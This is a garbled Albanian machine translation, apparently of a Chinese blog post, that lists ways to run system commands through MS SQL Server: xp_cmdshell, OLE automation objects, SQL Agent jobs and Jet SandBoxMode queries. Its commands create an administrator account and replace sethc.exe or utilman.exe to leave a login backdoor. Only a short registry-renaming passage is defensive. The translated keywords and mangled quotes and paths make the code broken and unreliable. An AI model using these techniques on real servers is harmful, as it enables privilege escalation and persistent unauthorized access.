mjedis Test: Windows XP SP2 + pro mssql 2005 (leje për të filluar shërbimeve të sistemit)

1. xp_cmdshell

ipconfig master EXEC .. xp_cmdshell '

xp_cmdshell e Hapur:

- Për të lejuar opsione të avancuara të ndryshohet.

EXEC sp_configure 'tregojnë opsione të avancuara ", 1

SHKO

- Për të rinovuar vlera aktualisht konfiguruar për opsione të avancuara.

Rikonfiguruar

SHKO

- Për të mundësuar funksion.

xp_cmdshell EXEC sp_configure ', 1

SHKO

- Për të rinovuar vlera aktualisht konfiguruar për këtë tipar.

Rikonfiguruar

SHKO

2. sp_oacreate

Objekti Krijo wscript.shell

drejtuar përdorimit të deklarojë master @ o int sp_oacreate Exec 'wscript.shell', @ o nga sp_oamethod Exec @ o, '', null, 'cmd / "c përdorues neto"> c: test.tmp \'

Objekti Krijo scripting.filesystemobject

deklaroj @ o int

scripting.filesystemobject sp_oacreate Exec '', @ o nga

explorer.exe sp_oamethod Exec @ o, 'copyfile', null, 'c: windows \ \', 'c: windows \ \ system32 sethc.exe \';

deklaroj @ oo int

scripting.filesystemobject sp_oacreate Exec '', @ oo jashtë sp_oamethod Exec @ oo, 'copyfile', null, 'c: windows \ \ system32 sethc.exe \', 'c: windows \ \ system32 \ dllcache sethc.exe \';

Utilman.exe mund të arrijë të njëjtin efekt në vend të sethc.exe pretekst cool ju, Huh, Huh

Krijo Shell.Application objekt

deklaroj @ o int

sp_oacreate Exec 'Shell.Application', @ o nga

sp_oamethod Exec @ o, 'ShellExecute', null, 'cmd.exe', 'cmd /> c neto përdorues c: test.txt \', 'c: windows \ \ system32', ", 1;

Hap Automatizimi Ole Procedurat

sp_configure 'tregojnë opsione të avancuara', 1;

SHKO

Rikonfiguruar;

SHKO

sp_configure "Ole Automatizimi Procedurat ', 1;

SHKO

Rikonfiguruar;

SHKO

Përgjigja jonë është që të bëjnë atë objekt duart

WScript.Shell drejtuar DOS kernel sistemi mund të quhet komandat themelore

Mund të modifikojë të regjistrit, komponent të riemërohet për të parandaluar dëm.

HKEY_CLASSES_ROOT \ \ WScript.Shell

Dhe \ WScript.Shell.1 HKEY_CLASSES_ROOT \

E ndërroi emrin në emra të tjerë, të tilla si: të WScript.Shell_ChangeName ose WScript.Shell.1_ChangeName

Pas kohën e thirrjes së tij për të përdorur këtë ju mund të telefononi këtë komponent të normale

Vlera Clsid gjithashtu do të ketë për të ndryshuar atë

HKEY_CLASSES_ROOT \ WScript.Shell \ CLSID projektit \ vlerë

Vlera HKEY_CLASSES_ROOT \ WScript.Shell.1 \ CLSID projektit \

Me menaxhimin e wscript.shell, scripting.filesystemobject, Shell.Application

3. PUNE

Përdorimi mënyrë PUNE ekzekutimit është një parakusht për të hapur shërbimit SQLSERVERAGENT, deklaratat në vijim mund të hapet

fillojnë master.dbo.xp_servicecontrol Exec '', 'SQLSERVERAGENT'

msdb përdorni të krijuar tabela [jncsql] (nvarchar resulttxt (1024) null) Exec null sp_delete_job, 'x' sp_add_job Exec 'x' Exec

null sp_add_jobstep, 'x', null, '1 ',' cmdexec ',' cmd / "c neto përdorues> c: test.test \" sp_add_jobserver "Exec

null, 'x', @ @ servername Exec sp_start_job 'x';

4. SandBoxMode (online thënë shpesh sandbox mode)

Parimi: VBS në qasje në thirrjet funksion shell, për të ekzekutuar ndonjë privilegj të sistemit të komandimit. Por gjykimi para këtij funksioni duhet të thirren në një regjistër SandBoxmode kaloni hapur,

Regjistrit: Software HKEY_LOCAL_MACHINE \ \ Micris

\ Jet \ shpesh 4,0 \ Engine \ SandBoxmode. Vlera e parazgjedhur është 2, personi i tha para se të 0 kryesore

Disable model SandBoxmode përfundimtar, që aplikimi për-Acess jo provoni mode SandBoxmode, dhe 2 e kërkesës qasje duke përdorur mënyrën SandBoxmode, tre tha Paneli plotësisht e hapur e sigurisë. / / 1 ose 0 mund të ekzekutojë komandën

testsql 'sp_addlinkedserver, EXEC' OLE DB Provider për Jet ',' Microsoft . Jet.OLEDB.4.0 ',' c: \ Windows \ \ SNK \ System32 ias.mdb '

master Exec .. xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE \ Microsoft \ Jet \ 4,0 \ Engines', 'SandBoxMode', 'REG_DWORD', 1

master EXEC .. xp_regread HKEY_LOCAL_MACHINE, "Software \ Microsoft \ Jet \ 4,0 \ motorët ',' SandBoxMode '

* Zgjidhni nga openrowset ('microsoft

. Jet.oledb.4.0 ','; bazë të dhënash = c: windows \ \ system32 \ SNK ias.mdb \ ',' zgjidhni shell ("cmd.exe / c neto test test user / shtoni") ')

* Zgjidhni nga openrowset ('microsoft.jet.oledb.4.0',

'; Database = c: windows \ \ system32 \ SNK ias.mdb \', 'zgjidhni shell ("cmd.exe / c neto localgroup administratorët test / shtoni")')

Në vijim është sistemi i vjen me dy fotografi mdb

C: \ WINDOWS \ system32 \ SNK dnary.mdb \

C: \ WINDOWS \ system32 \ SNK ias.mdb \

Përmbledhje

Disa mënyra (kam harruar një vështrim nga afër disa, ha ha. Ju mund të të menduarit të ndryshme, për të gjetur disa), janë testuar nga default, dhe shpesh depërtojnë shumë kufizime, kur ne mund një nga një kapërcyer, përdorimin e përbërësve të informacionit janë të serverit, lexoni, të krijojë fotografi, etj, ne ende duan të kenë të drejta në këtë frazë të kuptuarit e thellë e ah.

Shënim

Në exe *. c: windows \ \ system32 \ atje c: windows \ \ system32 \ dllcache atë

Nuk command.exe mbi cmd.exe të

Nuk net1.exe atë në net.exe

Mdb skedar nuk ekziston ne mund të ngarkoj një ah

Zbatimi i komponentit të komandës jo vetëm një Oh

Kalimi nga: http://hi.baidu.com/ CD%% B7% CF% B5% C9%% D3% C7 E3/blog/item/3ef3752d5a9a50e48a139914.html

Ju mund të jenë të interesuar në artikullin e mëposhtëm ↓